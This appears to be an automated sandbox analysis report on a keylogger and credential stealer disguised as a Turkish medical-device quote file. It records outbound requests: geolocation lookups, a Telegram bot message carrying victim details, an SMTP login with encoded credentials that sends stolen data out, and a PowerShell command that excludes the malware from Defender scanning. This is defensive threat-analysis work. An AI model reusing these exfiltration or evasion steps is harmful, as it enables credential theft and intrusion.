                                                                                                2024-12-06 08:58:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.749734172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:09 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:58:10 UTC884INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:10 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352913
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gCJ%2Fn6552wTa%2BisaMsH%2BdGoHeCSSsijElh2C%2FJFXBRiyOFQxpJYbI9uXZ%2Fvsl1pnKiNH2J68JpsFn8i1MvM%2B78MCqlVtM7R3bnpjT5eYoxRSm%2F1FLbSDf4RYLawoMOzZybqkpHc"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb12950b9ade98-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1464&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1923583&cwnd=208&unsent_bytes=0&cid=45ced1e2a880d8ea&ts=450&x=0"
                                                                                                2024-12-06 08:58:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.749747172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:12 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-12-06 08:58:13 UTC874INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:13 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352916
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neelSP4sVR28Zn8qxVPkX5OTAyxFhNi2HXhBozP5T4gWyedctmdMixghUD4vKE%2B4vZeH8MT92J5sOCMroR8Itq9kDAUnnIGf4wbVKMoY%2FMNUYLvGhMTt5384hUsGEIvsBvOOz8WT"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb12a82ed04334-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1912&min_rtt=1898&rtt_var=740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1452013&cwnd=224&unsent_bytes=0&cid=ccc9a10bc0025824&ts=466&x=0"
                                                                                                2024-12-06 08:58:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.749756172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:15 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:58:16 UTC874INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:16 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352919
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTKqSdy9GXmMxH5VslzIFwDmp7pVCtMQReUCoi0sxba%2FnGDhYk5EnM5CQmuBYaR%2BdgiHaV6BKeTHRTD9ty0qxyxF8xtLjLqUxaF60mKjaWp2RIUoc1kqpTWdrzeqRTcI3ZVCqnq2"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb12bb5a7743bf-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1740&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1622222&cwnd=252&unsent_bytes=0&cid=5228c45658c77b35&ts=449&x=0"
                                                                                                2024-12-06 08:58:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.749765172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:19 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:58:19 UTC870INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:19 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352922
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6NRjSQNeH5BYUbdLFXBRUT5JszOBbSg86P2sOeuOOG0bmYQrdQwwzJe81NBby2XgSxycgleNoxdtbv71psp2jYAQxN0YaXzLbeP2j5zEBWzcaUkegSN4SvX4GMHA5QQ6K3wvBYM"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb12cf4c327279-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1782&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1597374&cwnd=220&unsent_bytes=0&cid=505c46c9f1ec4db2&ts=465&x=0"
                                                                                                2024-12-06 08:58:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.749775172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:22 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:58:22 UTC874INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:22 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352925
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NW5G9CBYVXY4WiC3xMMvrvAevOGw2qnGAsTptRm676rm5sIXc4bUYQMjUvOh7UhV6tvshZmM9L5IePOaFQuygKhgb5oZMG25HIGcjXOgYqQ7vLb3QG%2B7QrMnmi6E3LN5RuDx%2BbpR"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb12e3b864428e-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1662&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1670480&cwnd=222&unsent_bytes=0&cid=f7f173644c5412bf&ts=450&x=0"
                                                                                                2024-12-06 08:58:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.749781149.154.167.2204437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:24 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2007/12/2024%20/%2009:28:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                Host: api.telegram.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:58:24 UTC344INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Fri, 06 Dec 2024 08:58:24 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 55
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                2024-12-06 08:58:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                SMTP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                Dec 6, 2024 09:58:33.702389002 CET5874980277.245.159.14192.168.2.7220-stilgar.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 06 Dec 2024 11:58:33 +0300
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
                                                                                                Dec 6, 2024 09:58:33.702600002 CET49802587192.168.2.777.245.159.14EHLO 745773
                                                                                                Dec 6, 2024 09:58:34.134870052 CET5874980277.245.159.14192.168.2.7250-stilgar.wlsrv.com Hello 745773 [8.46.123.228]
                                                                                                250-SIZE 52428800
                                                                                                250-8BITMIME
                                                                                                250-PIPELINING
                                                                                                250-PIPECONNECT
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-STARTTLS
                                                                                                250 HELP
                                                                                                Dec 6, 2024 09:58:34.136219025 CET49802587192.168.2.777.245.159.14AUTH login YmlsZ2lAYWRlbmRhbmlzbWFubGlrLmNvbS50cg==
                                                                                                Dec 6, 2024 09:58:34.568434954 CET5874980277.245.159.14192.168.2.7334 UGFzc3dvcmQ6
                                                                                                Dec 6, 2024 09:58:35.099234104 CET5874980277.245.159.14192.168.2.7235 Authentication succeeded
                                                                                                Dec 6, 2024 09:58:35.099524021 CET49802587192.168.2.777.245.159.14MAIL FROM:<bilgi@adendanismanlik.com.tr>
                                                                                                Dec 6, 2024 09:58:35.531543016 CET5874980277.245.159.14192.168.2.7250 OK
                                                                                                Dec 6, 2024 09:58:35.531796932 CET49802587192.168.2.777.245.159.14RCPT TO:<tiryaki.mehmetdemir@gmail.com>
                                                                                                Dec 6, 2024 09:58:36.008179903 CET5874980277.245.159.14192.168.2.7250 Accepted
                                                                                                Dec 6, 2024 09:58:36.008358002 CET49802587192.168.2.777.245.159.14DATA
                                                                                                Dec 6, 2024 09:58:36.440217018 CET5874980277.245.159.14192.168.2.7354 Enter message, ending with "." on a line by itself
                                                                                                Dec 6, 2024 09:58:36.440958023 CET49802587192.168.2.777.245.159.14.
                                                                                                Dec 6, 2024 09:58:37.045192957 CET5874980277.245.159.14192.168.2.7250 OK id=1tJUAW-0056lY-0h
                                                                                                Dec 6, 2024 10:00:11.241167068 CET49802587192.168.2.777.245.159.14QUIT
                                                                                                Dec 6, 2024 10:00:11.875353098 CET5874980277.245.159.14192.168.2.7221 stilgar.wlsrv.com closing connection

                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:03:57:52
                                                                                                Start date:06/12/2024
                                                                                                Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                                                                                                Imagebase:0xd40000
                                                                                                File size:723'968 bytes
                                                                                                MD5 hash:BD1688F2A780E8EA5437F539F5FFC596
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:03:57:53
                                                                                                Start date:06/12/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                                                                                                Imagebase:0x570000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:03:57:53
                                                                                                Start date:06/12/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff75da10000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:03:57:53
                                                                                                Start date:06/12/2024
                                                                                                Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                                                                                                Imagebase:0x50000
                                                                                                File size:723'968 bytes
                                                                                                MD5 hash:BD1688F2A780E8EA5437F539F5FFC596
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:03:57:53
                                                                                                Start date:06/12/2024
                                                                                                Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                                                                                                Imagebase:0x290000
                                                                                                File size:723'968 bytes
                                                                                                MD5 hash:BD1688F2A780E8EA5437F539F5FFC596
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:03:57:53
                                                                                                Start date:06/12/2024
                                                                                                Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                                                                                                Imagebase:0x760000
                                                                                                File size:723'968 bytes
                                                                                                MD5 hash:BD1688F2A780E8EA5437F539F5FFC596
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.9%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:2.5%
                                                                                                  Total number of Nodes:243
                                                                                                  Total number of Limit Nodes:17
